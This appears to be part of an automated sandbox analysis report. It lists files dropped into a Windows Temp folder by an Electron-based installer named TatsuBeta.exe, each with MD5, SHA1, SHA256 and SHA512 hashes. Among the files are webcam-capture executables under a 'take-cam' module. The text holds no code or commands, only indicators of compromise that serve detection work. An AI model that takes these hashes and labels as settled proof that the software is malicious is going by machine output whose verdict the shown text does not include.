SHA512 9ba3ea2d569d1d3ef09e94d7e66f843c8804368c4d016b6289e7dba002f7d2d50884a76c93eef879d87abcf8b36dd3e682b7bd3a18b2b5a969256cef672abf01

C:\Users\Admin\AppData\Local\Temp\nsdA2F4.tmp\7z-out\locales\zh-CN.pak

MD5 098d656a4f4bd8240bed10e7678186c7
SHA1 0c19ab62b4262f1b51558e8aaa79e7741f73393a
SHA256 a55f568ad3a8854cec25699484f55024501c8a0967738ba694e073151e5981c7
SHA512 084538ce774233ca6d4393bb42239b0b85e11bd73dd19ba47e55796ca19848941b037510c0fca4ac08b4b2e0ccbc9b4ae72ef88a3e841738dd211961dc53c1e2

C:\Users\Admin\AppData\Local\Temp\nsdA2F4.tmp\7z-out\locales\vi.pak

MD5 69c8796439192577f48bd249175aaf37
SHA1 97c52088ca69dada593db0e42b2135d264646454
SHA256 d7fdb53592de803a5fbcd8561c4918f1562f92fc8a3fd0039a2a1a7b76a8ecc2
SHA512 65eb7cb15291474ec7f9354775e59bcf334c90ddf3498ebd184e4c47118308421b2405bfa679e4b3a70ed1790e167c109fc2c72e89c3e31b5378cae975424144

C:\Users\Admin\AppData\Local\Temp\nsdA2F4.tmp\7z-out\locales\tr.pak

MD5 40491896ad21543f339467186c5efb40
SHA1 695dde7cc35056dcbf0a533aff8299d4c6b61bd8
SHA256 43e99e132acaba88971b81a43531845dc7fc3a1e0794c3373de7d9a50a5655aa
SHA512 18d5ee9914849462e0b1bafd1ca216b29d0795e282ae0bdb354b15caf5c18f37f44fbd6f626b2cbb095e3398a6496de72e5b0d15621433979b5a589e34fac818

C:\Users\Admin\AppData\Local\Temp\nsdA2F4.tmp\7z-out\locales\th.pak

MD5 43edd25f67ce6e6cea5373009ff0a1f8
SHA1 ed72ca6620cf23837e1334be50ccf616806bc5a2
SHA256 287897cf3df2db1cf59b872e6575ba8dfcaa0c1f68c17a9c91da6c4490adb8b0
SHA512 7160a72bd2e6b0ffa71e5d279995cc8be24a87cd9386eb29ab0eee79b8e607f5d824a11b6b4e3ef4c0f851a9d485a9642cb6adaa65c07933dca6e6f2c0052fc7

C:\Users\Admin\AppData\Local\Temp\nsdA2F4.tmp\7z-out\locales\te.pak

MD5 793a87d41cde6e6d1bb086284f69733b
SHA1 d887e3842b664f55b7308427aa6f5bf0b352d879
SHA256 5cdabd1ad41e8048f2cc6b1615e68b99159daa1aa6706b939447c1811bf0e255
SHA512 7c2e53baa387480eed45315bd9d53856ca46e5777ecdc9c29a0de7b0ad04beb6cbb8b5df0aa7c306395fda563037e06bea1ca70e433ce5a3ccc2ec184dfda972

C:\Users\Admin\AppData\Local\Temp\nsdA2F4.tmp\7z-out\locales\sw.pak

MD5 99e385ebc1ef8d3daddb3a171fa79edf
SHA1 3164804dfe9d9b5e891abafe92e5ba67d2b5d4d1
SHA256 8ec45ac391a085d531fb21815086c2da4841aa016653cb4f8484cfc2615d6c01
SHA512 797c105fecef1e15870aa101e3fa1835d5a467a9059c03b3636c54934d1de263ab7f23599e21d9787cb3849c7cb7d29f5bdd8ae9ad10fda8015c1392462e94c0

C:\Users\Admin\AppData\Local\Temp\nsdA2F4.tmp\7z-out\locales\sv.pak

MD5 41e76f7775fc9a2d6e3c02c46e9b32f6
SHA1 088c15c74a68bee69682bf89c31055332b68c84a
SHA256 2533676479e9469ffcdaabcb47d3e39bebfe7ae2b80f70784e918a8827439e13
SHA512 6cde752d748c4772b533c8894f18134e5842113f8c7590b44a7dfa088aed65b232361fd16170df3b0d738066dbc3a769847adf4dd8ba42de63c9c2b33f9beb6b

C:\Users\Admin\AppData\Local\Temp\nsdA2F4.tmp\7z-out\locales\sr.pak

MD5 af7083f2a4bd95dcbe792efade352662
SHA1 dc69aa831836016f6e66c6079931503d534a7862
SHA256 e3b80d9fdd420a05d66cc12e685ac94500106dd51a555bbfa2d085094f81e8dd
SHA512 342400ba94f6cd08152f96aa2b905184fab429c38cedb4bcb4ac0c503169a9ecd47aef208b4d7ffae08b0c0afa7aa089347a20739379d05f3e4e111be842b8c4

C:\Users\Admin\AppData\Local\Temp\nsdA2F4.tmp\7z-out\locales\sl.pak

MD5 e015b6f5042be2dc96a4e23dcf035502
SHA1 7946509eed8db1e4c1f3da99ffe7155c86fdb4d6
SHA256 99536d1bc73eec81d5bebbff641ea195544ee5e3a41bb17ddcedf9cde9b141d4
SHA512 b2a2eaae93c506a053862bf1cde02eee53b3ea2e2fe4c964c51dbacb8b44de820a779311cfe01458e2f08f88bce1172e8c5e1e6d28cd3a355ff84baa00023b8f

C:\Users\Admin\AppData\Local\Temp\nsdA2F4.tmp\7z-out\locales\sk.pak

MD5 b35daa0bd9627ca88b413a5af7c6b4a4
SHA1 d5efdcbc7ca17de29f3075f6434f31ab2e895826
SHA256 f47bc1f7f5ab64681d0b152e1a019da60f0ef057ee8bf2ccede019dc4030c177
SHA512 48abb6ca2290820db2898b05820bb25e70fb1292c816eb0c8f17b3c5452de9fff7027d216d2bf413900f408f44ed4ac99151b28142a212c5cff8dfe229e87b9b

C:\Users\Admin\AppData\Local\Temp\nsdA2F4.tmp\7z-out\locales\ru.pak

MD5 75457b95d2bb03891232dae7db886387
SHA1 e5a7569df7f91533703626d167ecc8cddbd27205
SHA256 e0894d3aa3f8e0f8ac457a3300001d4e1dcf95980712f8c8e9c845eb4c2bbfa6
SHA512 9813239cb162cec24cb81cffdae2df06889782813d917da186ae40df6dae64477467e4b32ead2d714bc1de671538d4c1fde990d83d3ee69e0932f17226687a78

C:\Users\Admin\AppData\Local\Temp\nsdA2F4.tmp\7z-out\locales\ro.pak

MD5 24b01a438a3ab9699d4ca97c081b5e82
SHA1 0d0b082544d23425a74199fb0a6c11192f0bdf7d
SHA256 38290b1c9712296d82ea1681ef95544a1eef4872289134b11e50af735e6deaca
SHA512 43199772312156f4633c4202499cde8f808e5e632c2013ec1129acee01a3f184e86df2616626173178efe04b6f0773ad9a0e8b8cc6a735d23d68dcfe9dfd945b

C:\Users\Admin\AppData\Local\Temp\nsdA2F4.tmp\7z-out\locales\pt-BR.pak

MD5 88ad860c73676ffb4025b5c691f29942
SHA1 3c5e5b999ea7153ccdd1b4cc7b6162de3456b558
SHA256 25f0bb0b0230d99a9064d52668636f3be85903bf27a68124d79a2fe93c30fe0e
SHA512 41589bb9ab1b8307f62ceb4e6493d7903731a3e63807e0044379c4acdda881c21839234f5f1b8ad1af732bfee6231c0556ce92e582505379ed949980185bb750

C:\Users\Admin\AppData\Local\Temp\nsdA2F4.tmp\7z-out\locales\pl.pak

MD5 644c0ace25d6e532b56510a736c6bc2c
SHA1 1bd0fec952107b493da04c46423da634ff3e1504
SHA256 2ff9e382a31783285b7d85676e629e2f6db26bb9536ed17b7fbe5ac61a895ec7
SHA512 9a1f1e884c2f214b8b0c63543809ddd4ba0fd533f1d8434e926051f3db434f60cc4df2462c2a43254b2a9685b3869eef49463c212892e417c82c3a7b497e3559

C:\Users\Admin\AppData\Local\Temp\nsdA2F4.tmp\7z-out\locales\nl.pak

MD5 cf6b1cbfd669e9461553974ba37a475e
SHA1 b33867e9bc7fd88ca98a76dc4bd756bcf18887aa
SHA256 9a83ad866ad7fd9d65ecbc1e95c276cfce27e8257c76a16950fd14971e66b864
SHA512 e463029bb37f6bb3ff5cb6281f64291ada1b785fa33137e7aedfc7b5e409e99c75a91e7cf9b6c0933e970f70c14861190de66fc5d68925b687a6f5da02e21077

C:\Users\Admin\AppData\Local\Temp\nsdA2F4.tmp\7z-out\locales\nb.pak

MD5 b61e42f66d581b6a8929cdf5fb10662e
SHA1 6f06fa9ee092fbcb61bbd668734fb3b92cfb549a
SHA256 1b17dcde8fc7308d926fbe0faa83dfc9ffe2efc5715e9afd557dde839ad98b7e
SHA512 79b82346c3f133a6ba44148a8432ad4e08e2805187b759509cb386bc800fd20215592c07d953812c243f0b1d5e1354245f2cb42b2b3eb6c87280bcb4008dbe97

C:\Users\Admin\AppData\Local\Temp\nsdA2F4.tmp\7z-out\locales\ms.pak

MD5 6cfadaa784e687e6dadbcd80e631bc9b
SHA1 481acb75f525055bf4e45ecabe0eadcb9c492106
SHA256 fb5e125dd5e1f21e8df229d22cb3d1f9078bd79bbddca352899248f2a8b21b71
SHA512 0d7da5a90fe9372bc704ab8cdc8cbfb14d323cafdef856987e2d9e34d980196c03985e25099f5d1bcb10c97f040f4766e2c3713718649bb3f43914a77f0dbb39

C:\Users\Admin\AppData\Local\Temp\nsdA2F4.tmp\7z-out\locales\mr.pak

MD5 f22c99fe6a838e333e8ee06a4d01296b
SHA1 c3542ea8dd45a2b387dd02fa5687948f135e10f2
SHA256 b03a3042f907aed13253ae8083d08f5fad59ff438d024b097276856e72526911
SHA512 882022c2cb985d85f96d52c9bcfeeb089d6ff30e66187ccf424ef622092b9d359a51bdef1fb6ac3b9d3409aa79d37ca737ba7f3ed8b9cdaabfe04d90a7c8bc15

C:\Users\Admin\AppData\Local\Temp\nsdA2F4.tmp\7z-out\locales\ml.pak

MD5 04b2540c25990a5e0a9b227dcce6ae0d
SHA1 4f8ccd154f54dfb083d4d1a3ed0994842c8ab13e
SHA256 556165b8b54c6e21bc66d12b3f5be393136714467c427f7114f314d18ad3c661
SHA512 4cab47e42e8f5d4a83851871f97f3e1360c993ba530dbb4b4b736350779784bd83189e1195d3480ce87298bb8f9b7f249fefa7764d850e5b0002895609626785

C:\Users\Admin\AppData\Local\Temp\nsdA2F4.tmp\7z-out\locales\lv.pak

MD5 264c6e20b3088ceb4dae5773cef0cb55
SHA1 fb6ff83ff14df008092bc3ee73bda7491e8e090e
SHA256 a676a781c1a587eadf23e5c69bc52f2d352346a70bc53ca908450362535eefda
SHA512 01e949f92e1e8599c581929a601d39640abaf1d907ce10102e591c3d490dd3874c679c75bb51308ead55a3bd0c6dcd1b8d4b2daf98ce1cf1c6bab42946e8b1e8

C:\Users\Admin\AppData\Local\Temp\nsdA2F4.tmp\7z-out\locales\lt.pak

MD5 2d4fca437a7548893dc4b51fa5b33c33
SHA1 c1493013d7d981ea9223716e415380992de65c2f
SHA256 776dba792df7b444e1b720326312d8b8312cade74a1372c49456d932b7c65769
SHA512 b6a55ee1deff48d717a3e9399aef3c45eeec810cc5b5709fa3e9f56850115a5b02e02b7959ec77a6797e68516ee9372bacd260e62ac0d55a8e4c1c27af782b42

C:\Users\Admin\AppData\Local\Temp\nsdA2F4.tmp\7z-out\locales\ko.pak

MD5 d6e2c18c9eabba59b50d147d942125ea
SHA1 0918879203c2050b4f9f449f5616e430897ba0b9
SHA256 f3581cea2e5b022b121010ffc5d67f86f717e3a0c0402abd81e24c87fd135b76
SHA512 f605f7b9893166778af156f9eb76eaa1209e7432450899540cd462ce0ffa69caf6f570b910cdd6d7bef54354379e9892a658e711baa93241da33755c107da859

C:\Users\Admin\AppData\Local\Temp\nsdA2F4.tmp\7z-out\locales\ja.pak

MD5 833e8c4aa70351b6be7bd403e4e9a0a7
SHA1 46ccdbdea35deec8ef13a5fc833776875fad187b
SHA256 74422db1a5f28522f9a8b31a3bee9a6df794b419bf723cb6a6c88e82eb72cec0
SHA512 e8e709612a5ea81d2822e0025b7306f38571f2cec2ca72ac5a8ab852a0e36a0f5bc7e00d0baf7ac7becc2c54dda3a17c52ec1cd67ce12b14d91b6ae0b726d556

C:\Users\Admin\AppData\Local\Temp\nsdA2F4.tmp\7z-out\locales\it.pak

MD5 5aa225aad4f9fe6d05ec24905a827d88
SHA1 f6d5ed337bd8e9cc3b962d3a498e3430fbf6de22
SHA256 96e02ab6937a1f1cb58762159761a737ce0e1dcd6a253554392baf4389326eab
SHA512 3fa928f19bdf65b8fbb274b478a801821b15c01224c113a8d7f6121a077b432c0cc84eefd9028a76adea9fa4bb65dcb868edfbd4368b1e4d477c49e187e4288a

C:\Users\Admin\AppData\Local\Temp\nsdA2F4.tmp\7z-out\locales\id.pak

MD5 e40cb2f3b4db379e4d187aeef0dfd300
SHA1 537b1ebc615c980c89bbe2b9e91a11199fa7d6a6
SHA256 3339ef011c9bb64868da94adb25f4490acbc7f893e4337dbfe2797754cd659f5
SHA512 b87464460077aa55feb92eca8ed23d9a61829378bae7890c8a95dac5fcd735b145d65661f27facfe2586fcaa169692b00d8ee8dd505dc44bff7f7fd090f3e96c

C:\Users\Admin\AppData\Local\Temp\nsdA2F4.tmp\7z-out\locales\hu.pak

MD5 71d42cb22d2d7a8b26c4514ab12df3aa
SHA1 cd0307503a7906f1742d1e98fc816959319c2171
SHA256 b51bcb888dbc27bab88a8c9d081df7496de8a9a5a4cd2cfe08abc154190e75e6
SHA512 29c67391bca706807be3a0cc79fe481f220e30263957a9c2485f0a4c498a5b250bdd83b5f4fad8d0b19c8a9a07d5650b5ebd5816b6aae311a1cde78a89303244

C:\Users\Admin\AppData\Local\Temp\nsdA2F4.tmp\7z-out\locales\hr.pak

MD5 6f92235e6ba003af925a2d6584afd27d
SHA1 3ceba61e9c2975466b6244188f5ea72aaf042fc7
SHA256 479dc4f75a889d45f62b4ddb6eb48f21c473e37875468c9c26d928a263e15840
SHA512 82f2642dff4400704c15c2fa02d0ec74ed3fe888dc835447c1afce7463dee8f480bb81be358c306e681625864a6d25e5cd6c96252b8a56e6fc62014b3aa4d26a

C:\Users\Admin\AppData\Local\Temp\nsdA2F4.tmp\7z-out\locales\hi.pak

MD5 590e9e73df9cbd83cd87b9c03848fec9
SHA1 da125e60a5a2c51a2d6219d3f81688bd22237b59
SHA256 089b9dd31090a987515809a68d26f6eeb64cd9283934e3dcc48b151eec7d3ad9
SHA512 fd0e5d0f2063e12b711275f390428b88f98ffaf6043cdb14b13674ac1e4aa9f70ae820ae960132d7155daf9b1308238775c4702694ab53068cdc709c50f9186a

C:\Users\Admin\AppData\Local\Temp\nsdA2F4.tmp\7z-out\locales\he.pak

MD5 6a02a37e1ca3215fa9ee0e1b0fbcf5e7
SHA1 89a8a126c0bbf536ac58e29fc50e045fb1b88220
SHA256 f5cf34ce58b7f0d450936981aa7ffa060821403e6768eee3746ea4ffc9193986
SHA512 6607eb2329b81f1eaf0ed3a564eddcb30e6ab59229f2fbf6fd3d2140ffaa8853a330eda627a4458ef6bb06f32c5183edda869e34cd4ead1f87f88d5c622c1a16

C:\Users\Admin\AppData\Local\Temp\nsdA2F4.tmp\7z-out\locales\gu.pak

MD5 63a7fdc4eadf8ef1c35c72468a0ce33f
SHA1 e8d064f0e9c8a6a8c6ccb036711e292d011d9466
SHA256 e549ff4e5a094d04c2ce7bc6fd68bea1f03e935437bf164bebb6191c133fa70c
SHA512 0a097ff875132a984545ec677b04f97785f14c38a1df487cfb4722cdea07d14e1e88fcff7d58b82fa53f05f4eba779a95ef320b5a91692097726d0385a26a456

C:\Users\Admin\AppData\Local\Temp\nsdA2F4.tmp\7z-out\locales\fil.pak

MD5 40bddaf97f64dfea9ebafc7f82166f80
SHA1 90d1fde3c0b27d2184f0353991259c2a92c7820c
SHA256 39a9d63736e7b4593fc6873ed3c19d45fbf9eb78a012bfdcee0fea5906ebc5b2
SHA512 d1e61c53e09a0dc50edf5aba5cf286a251ee88421aa2cd49332b70a5859646605ecb7d0bb97ea7242d14a18742e23da0a14c04b0b99b57a466ec87f4f66b897e

C:\Users\Admin\AppData\Local\Temp\nsdA2F4.tmp\7z-out\locales\fi.pak

MD5 cc592d91ce8eabaa75249cb78b889376
SHA1 f2f0f7f105a17f3e4b1a97ed0e3c2e871c2c3eac
SHA256 b1cb0b32efa78fd8634652c74f298f1d5127f2363ef601cf000417e5c7fefd20
SHA512 58e2eaffe26d8fda8df43e7ebef449cfff1065e940c128efa0276511e34e96e52da9230f294b01d4ecd8ef606b792d372bff897d6d8bb67c31379418ce867d48

C:\Users\Admin\AppData\Local\Temp\nsdA2F4.tmp\7z-out\locales\fa.pak

MD5 6458a239e994d8d18315deccd35389ed
SHA1 75c985f43503a6c44645786d46639a6b555ae163
SHA256 300fc1c735e92917a5ddf92feb812cbf3175d988ec7ad5955110248a1addbd34
SHA512 3062075b6be0c25c957ac88e537880bc25ff86b8ef0703a05209e9676e943e89476b7997394aeb25064e03a93be614fef535676e9cdfaf44b46035225b1b2cf5

C:\Users\Admin\AppData\Local\Temp\nsdA2F4.tmp\7z-out\locales\et.pak

MD5 c76db3385190c6840315c4497e40258a
SHA1 34f1aef2ba2925bebc5dcdb70e5b6c1a138a5c46
SHA256 e8af084ef5e1062c5966dd7802074ac24f3672dc3c9b9c5453a397644727191f
SHA512 90a870369d307758b33d74e6213676d65c2d332f42577c8aff23d96b512f3c2a2bdace8d6d9007f88b9175eadc6f2ae28b498b1265550849ff9317465a37ad29

C:\Users\Admin\AppData\Local\Temp\nsdA2F4.tmp\7z-out\locales\es.pak

MD5 f83d8f7f6108786c02c2edbf3d85f147
SHA1 57781d9d9eb7c90cdc71f78e25d0763045b6d29a
SHA256 5b929216ac823dbe2b0bb98e64db76519900e09a86c8513019325271c66ade0d
SHA512 12747a4a61cdd21cad6e3f768cb43b8bda5ec9de373337c191b6994b20acd676c9d0a6cde8410a1e18f35dd5d2d332ea1bb7e7f8f6fc4b73d8774559e33398f1

C:\Users\Admin\AppData\Local\Temp\nsdA2F4.tmp\7z-out\locales\en-US.pak

MD5 0bb857860d8c9ab6d617cea5a5bd4d00
SHA1 351b744d95846bff2ce5f542fec2e87439aa0f8b
SHA256 5c56df9699fc7e8f09ec81421e50a6264cde055e822f5a8cd9bb1edb3066d816
SHA512 33fb73cffbb6781488cedbca4c92a7e4f66923a799beeb7f5cba58dbc23ba8f5130f63a7dac7114e3c3ef6f1df87884fbeb8858bc7604aec9449fdfd16c25078

C:\Users\Admin\AppData\Local\Temp\nsdA2F4.tmp\7z-out\locales\en-GB.pak

MD5 52e2826fb5814776d47a7fcaf55cb675
SHA1 51fbbc59dcd61116cbc0a24b0304d4c1c58e8d0b
SHA256 83ff81c73228c7cadba984d9b500e4fce01de583ecde8f132137650c8107c454
SHA512 69257f976d01006c5f3d7e256738c97c59115471f8e7447cfa795f7fa4ff12d6fd19708e95ffb2aa494b50c1763fe35d5885b9414112d2934baf68fe668ed7cc

C:\Users\Admin\AppData\Local\Temp\nsdA2F4.tmp\7z-out\locales\el.pak

MD5 38440b98bfdf5ed496da0f49d59534c0
SHA1 1498d9207ecaf4923a47271e24c68a817041c82e
SHA256 b1f78df8a7edc914357a2e90bc8dc0ac46f4df642bb22894569fe4905fb8ea0f
SHA512 95ba788fc2e1f07d54e398f1ec4d32c664cfb13118d46cb7af7a993367e032b10de84f3e604ab6e659d6410e2d736097ec5e9b3b002040c54412358f0ea10229

C:\Users\Admin\AppData\Local\Temp\nsdA2F4.tmp\7z-out\locales\bn.pak

MD5 47c95e191e760dee3ef43345577e2379
SHA1 609634315270a91d4ec631642b18bd0036367aad
SHA256 ceed32e429ed1018d4c49343cf52105cbfd1e877c531a5738fd6e6cd33d27da7
SHA512 46b5f8d58780d19e79136c31a67d075c57ddf7e6a1eb197dea4088cc414a0dc24a68fc8ebcaac03b3940af2461123b586706d5dbf8dbdf6fbea0f7bec466db21

C:\Users\Admin\AppData\Local\Temp\nsdA2F4.tmp\7z-out\locales\bg.pak

MD5 5ba0c7200362c9ed55610cc8b66ef53c
SHA1 d45239c2f1b00885407771a41a7776fc1fe8fa3b
SHA256 2339ff55464b4ff704fc3c5bf281eec52a539c494bd059cf0346d9c05ab7cda7
SHA512 6229dbf08a9322c4ec8de4912aa1832f01800a71b7e3ef5870e7fa2b623be4dd248fec4881c3e031e984616147be84d42ab3dd970ae56dc1bd78913a8682a37a

C:\Users\Admin\AppData\Local\Temp\nsdA2F4.tmp\7z-out\locales\am.pak

MD5 e18a450ef034b42599341c3d09f280f1
SHA1 2001c8a85904962ac3a96938eccc69ad2c110fdf
SHA256 7c2b9098130f1f9e0cf4507b64c0e96ac6354bd6c3616be20e2067cfccc820da
SHA512 ddd87571218fe9f179a6c2a8a15b182625a71a7c19ed90c0969ca2e0e9bad823b926f8b8a6b390cb6fe9c95f4b6c1f1ec7b5167a8424ab1921943922208f798a

C:\Users\Admin\AppData\Local\Temp\nsdA2F4.tmp\7z-out\resources\app.asar

MD5 19a7c7a8734762ec6063f5655768d18a
SHA1 a2ae776e9dc14129587353da88c2e5f05dfa2756
SHA256 b8ea03192f9c55d68224b9d54d1dd318e43287bfa19fd5e1b076183f50bf07fe
SHA512 8751d01fb67675826187e83fdf26a343169dac1bc1315492d7ef65b6c4382c79eff8652bba70f213becb29fa842b191bfde5b69917985a00343210fc0e90affe

C:\Users\Admin\AppData\Local\Temp\nsdA2F4.tmp\7z-out\resources\elevate.exe

MD5 792b92c8ad13c46f27c7ced0810694df
SHA1 d8d449b92de20a57df722df46435ba4553ecc802
SHA256 9b1fbf0c11c520ae714af8aa9af12cfd48503eedecd7398d8992ee94d1b4dc37
SHA512 6c247254dc18ed81213a978cce2e321d6692848c64307097d2c43432a42f4f4f6d3cf22fb92610dfa8b7b16a5f1d94e9017cf64f88f2d08e79c0fe71a9121e40

C:\Users\Admin\AppData\Local\Temp\nsdA2F4.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\package.json

MD5 067e233b0609d56ff4756bedd8c0efe0
SHA1 96419d05adc4b6674948b4ac14f8ab5bb3ce4380
SHA256 6bee642c1b5de99e4edba87ec3221c2ecd10b65e666b6f2bef64a745538ecf74
SHA512 94900f5ff762930b1b060ba4dd44d629d6c3e2dfc0dacb1a543f1ea5a3cd40e793acaff4abefbff588ceb422d65f8041ec190a2b56f7c303c3314eb16eca4159

C:\Users\Admin\AppData\Local\Temp\nsdA2F4.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\DirectShowLib-2005.dll

MD5 c20c205c6f8d70a5e1351a4041a3ec9f
SHA1 e1b2a763dd6c42439656e4e55aba0f3610ff3784
SHA256 bbcbb170242d9ff1b56680a80b1f8755df1135f9c714535ff3b3f575442f38dc
SHA512 dffd59d775dbb89cd886a2212fb9fe4cf0b2bdd7f2c00f8dc7c6b2287053b4971c8c6c033109ff1f90cdacea082e44d3c19fa76325d24976420c418218e701f1

C:\Users\Admin\AppData\Local\Temp\nsdA2F4.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\snapshot.exe

MD5 16a12bdc986207390dd79d658a6b2263
SHA1 b4b41f62cbc1e1ede786c6e30e11df8e61750bad
SHA256 50a8dd2f292bea9190204a42de067a34d5cbbec53746d40fe5b067fc85190bac
SHA512 d20394028c5d3ca46bb4879cac40da07b7d857f9a4a834bb4db4bd047f1a3265a80e1f7528244da6ee97c2f3e0cb5b2e51bc88eeb382a027939c2188e66dcdd9

C:\Users\Admin\AppData\Local\Temp\nsdA2F4.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\prey-webcam.exe

MD5 471b15abc9f2e98fb7ed7361d3f045eb
SHA1 95b5798d80a9410872f6ed485ae2b43ca3745540
SHA256 7c262639cb22348dfd627dc07c76e8748e5bcacde2dcf1614773ab174c831004
SHA512 5b3b59aa1dbaef31b0ff6ccde082d7c312e39e311a46fe20d590d5d7765f934d3b663da9609ff4fb7beba2e8fa85376cf74f14ae077f3c0b49189cc28c30163a

C:\Users\Admin\AppData\Local\Temp\nsdA2F4.tmp\7z-out\swiftshader\libEGL.dll

MD5 19dc9ee70e7765bb63a66b6826e8ecb7
SHA1 1a12f983f8b35cc2955d30657971f113c47dc164
SHA256 83d5719abee35e051d984510e1d5d9317a109031698814742b59bdbbe7d4e30f
SHA512 1fda2bcc4b2e70987ca6011ab2534007ae4f752016d29a588aaae839bb25c35e03773f220b6a8e926cf2643997e7d4c0f28743304269b2c55642ce12934def68

C:\Users\Admin\AppData\Local\Temp\nsdA2F4.tmp\7z-out\swiftshader\libGLESv2.dll

MD5 e3d9a626ce506b6ff312cedc8c92cff4
SHA1 a5d28e10746bd7255ca3eae37abdf016aaa99737
SHA256 8212034b22fcac9ecf6c1e5d317d053c63f5d694c8988e33f9887674ef529d61
SHA512 820eaf73baad0ea3a81a2bfeb5c88085b48cdb63770d256ca6ee5061bed08937f25af43884737545d1cad95dd6ab20be1f3027393eb74e295151821185fdc333

C:\Users\Admin\AppData\Local\Temp\nsdA2F4.tmp\StdUtils.dll

MD5 c6a6e03f77c313b267498515488c5740
SHA1 3d49fc2784b9450962ed6b82b46e9c3c957d7c15
SHA256 b72e9013a6204e9f01076dc38dabbf30870d44dfc66962adbf73619d4331601e
SHA512 9870c5879f7b72836805088079ad5bbafcb59fc3d9127f2160d4ec3d6e88d3cc8ebe5a9f5d20a4720fe6407c1336ef10f33b2b9621bc587e930d4cbacf337803

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

MD5 a94ed5c105900271e0a999e7023c9ed0
SHA1 627b6120e167dd243256791bcfe55b77eaf2c59c
SHA256 949dce72bed0b5651ab166cded4cca334676c6e810a1deeb84ac8be4f3ab09ec
SHA512 e8d40a342e11b5c36a82185f93d0743b2c1e866944123b25cf313b9435cae8807586e2e78737d3402bdc0ba2364091da1ca8090786dd36b5a85d0c118920b232

\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

MD5 d9841720db473c2c8b0fb04ce0d92cd9
SHA1 e5001dbfe46bfd5d2d5102679302c6633c3ad13f
SHA256 fbc4abb676e9c12973d9435362420d29a9684e229c104530ac91d147084bd808
SHA512 4194df5a403854b0abe86c449c7ecd810ca41975d065018f4d25da09e3a794bd5226640eca404363edad1b6bcecf35444299d77312d959a742d000a078cba294

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\icudtl.dat

MD5 9a676a4bd5e211d76506cdc8ac49be2b
SHA1 5f86c685b97e272e96d94204faecea55d4a72ed7
SHA256 5e4e52e60df1bd78be7a5ed0d0c513cefa7a22e887b2c090fca9b60610f82eee
SHA512 0290397cfee824109c7f2a0a04215838446c5d225a503d4070190b7f8851fcce9213b8d2a820b52f0887628684c40b954575907d39283e17999b14cb8f933c0a

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\resources\app.asar

MD5 9e4890c514fd7c22bc71c95df900d733
SHA1 b2743c5e82a095f0d410d7aa0aff86f8235a4a93
SHA256 931e1c3287d73d78d43390dc9cd1d7d7b80a8bd7ebbe29d018cfa8c411e54e27
SHA512 4ae831138d30c27a970ce103d731a75bd662e115eafe6ee0a852e4def457c8b964a71c495133ee24334fe6945c1cd0398d4f2479276c7bd2086b0fb1cf36e284

\Users\Admin\AppData\Local\Temp\f46b576a-8e6b-432e-b117-2a1edb15581c.tmp.node

MD5 3072b68e3c226aff39e6782d025f25a8
SHA1 cf559196d74fa490ac8ce192db222c9f5c5a006a
SHA256 7fb52b781709b065c240b6b81394be6e72e53fe11d7c8e0f7b49dd417eb78a01
SHA512 61ebc72c20195e99244d95af1ab44fa06201a1aee2b5da04490fdc4312e8324a40b0e15a7b42fab5179753d767c1d08ae1a7a56ac71a6e100e63f83db849ee61

\Users\Admin\AppData\Local\Temp\5472632a-bd88-486c-8442-ba783d3da9c2.tmp.node

MD5 5317f23583ba935be25a4c26b3f93828
SHA1 bdc288a0576a9ca04295c2df6f71e260ae5097bc
SHA256 41db88f72dbc4ace9b4e6522b19f60e012980345fcb737cab1839ab0bb2f2cb3
SHA512 e3975f92f6bbd814cec4b6762b7f7475168dd43a717031de0d8055b7f5e4ce01dd011557c1301f9f9084f8a39248630c12f265a195c54c81f1efad9dd5bd91d0

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\resources.pak

MD5 72cc2a6df13551c1383afa05bd247ef4
SHA1 4dc4b85775fac88f4ae95d6f3cdf549fed0e1b11
SHA256 cfef50645522db5dffa667be287fc2a9aa1543e979d75bd7084e1b632903e50e
SHA512 46112fa39b44e310be9fb50c1c76b77613ab040a6d98f0af1d97d6ead27d0c195b37596cb2f83e265efe92bc6150e3dd2098ed29cd781bb4f67f92aaa623ad36

memory/2904-580-0x0000000000060000-0x0000000000061000-memory.dmp

memory/2904-614-0x00000000777A0000-0x00000000777A1000-memory.dmp

\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\ffmpeg.dll

MD5 8ef6c0d8fae95d37534b8dedd804a98f
SHA1 a40160a6811d5683c49b455c93a13dac37ada7a4
SHA256 374fb06628d5ce2de3b95e9e61226a0cd500367a3c46aba417a6028b651262ea
SHA512 5248ddb4a6b57aa1d115b12c5435444167d2fc42ac286b182e7e60229b751f9ef509da44392f1965d50d312bbe9e75b3fa11299067ca2a240a942a9a34c41691

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

MD5 79d53932d297a90f5a6eeeb7b6fa1e0e
SHA1 cdc5bf161c4918db31c8e94a9a6cd6bc93ea74d2
SHA256 f279f6dd209265214893347acd697c518a98f949d25b631b1550c8f523a278bc
SHA512 661ddf1f782fd16561f853aa8b987dc8cff298b39ad6e82772fe12f694d10f81dab9c962e0a86f54addcaf8d9dd872685842ff72498b8eb8437a98e322ed1168

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

MD5 52aa4979a3faee70eca6fbfbed749f2b
SHA1 3c8d7b5124718b0f0620d347b86b8ad72a217c07
SHA256 682deec9c5d612ba5df5e600c7226ca699965f1c1999d2861a39f67a573e20df
SHA512 2d0cce6e2068346eefec4a89bcb5d63c8eec0202dd4d6eeb9fa18e5f90387a082b0d2cca52be75f47f15c34e069893aa63ba259691afad9641104a4e170679a8

\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\d3dcompiler_47.dll

